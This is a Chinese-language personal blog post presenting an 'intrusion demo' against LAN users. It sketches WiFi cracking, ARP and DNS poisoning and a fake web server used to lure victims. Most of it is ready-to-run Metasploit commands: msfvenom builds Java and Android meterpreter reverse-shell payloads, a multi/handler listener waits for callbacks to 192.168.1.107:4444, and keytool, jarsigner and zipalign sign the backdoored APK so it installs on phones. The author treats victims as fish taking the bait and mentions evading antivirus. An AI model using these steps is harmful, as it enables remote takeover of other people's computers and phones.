这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来…以前的博客还是很稚嫩啊…
注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现
(2019/1/7添加:)大致流程:
1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当
2.监听局域网数据流:利用arproof或ettercap或wireshark可以实现
3.劫持流量&arp毒化:利用2中的工具即可实现
4.dns毒化&搭建fake web:利用ettercap和setool可以实现
5.替换对方数据流:利用ettercap可以实现
6.等待对方运行:自己等吧
metasploit
不愧为一大自动化渗透神器。各个平台的渗透轻松应对,现在除了iphone我还不会,其他的大多数平台我已经来去自如了。利用java的跨平台特性同一个payload可以直接拿下大量shell !
It’s Show Time!
首先打开Kali Linux
msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=192.168.1.107 LPORT=4444 -t jar > jar_test.jar
# 使用的payload 是 `java/meterpreter/reverse_tcp`
# 生成的jar包直接用 `java -jar XXXX.jar` 来运行
打开msfconsole
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 4444
exploit -j -z
# 然后就等着鱼儿上钩吧 ^_^ 使用 sessions -i 来查看上钩的鱼儿
首先演示 Windows 8.1 上钩效果
运行
上钩
接着是linux
我就用kali linux 本身来测试了
然后是我日思夜想的Mac OS X
哇咔咔!!三大平台已经干掉了,就剩移动端了,
一般来说Mac电脑上会装上java的,所以这个payload 成功率很大,而linux自带java,有些电脑小白不会在windows中安装java,单数那也不怕,我的别的文章可以直接攻击windows,专门攻击windows的payload还是相当多的,免杀也可以做起来。
iphone咱先放放,我还不会,安卓就是小case了。
安卓的涉及签名什么的,比较麻烦,耐心看下去…
首先生成一个后门apk_test.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 R > apk_test.apk
首先使用密钥工具创建密钥库
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然后使用JARsigner
签名apk
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore apk_test.apk aliasname
再用JARsigner
验证签名
jarsigner -verify -verbose -certs apk_test.apk
一般Kali 没有安装Zipalign
apt-get install zipalign
然后用zipalign
来验证apk
zipalign -v 4 apk_test.apk new_test.apk
这样我们就有了一个带有签名的apk,它可以安装在大多数安卓设备上了
我安装在模拟器中
然后打开msfconsole
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 4444
exploit
然后运行apk
msf的结果是这样的
OK!
打完收工,目前msf只能应用于内网,要想应用到外网,要有外网IP和端口转发,这个以后再弄了(2019/1/7吐槽:后来根本就没弄),附上两个参考链接。
msf Java 后门
msf VS 安卓
累炸,十二点半了。。。。我当时竟然十二点半就喊累了…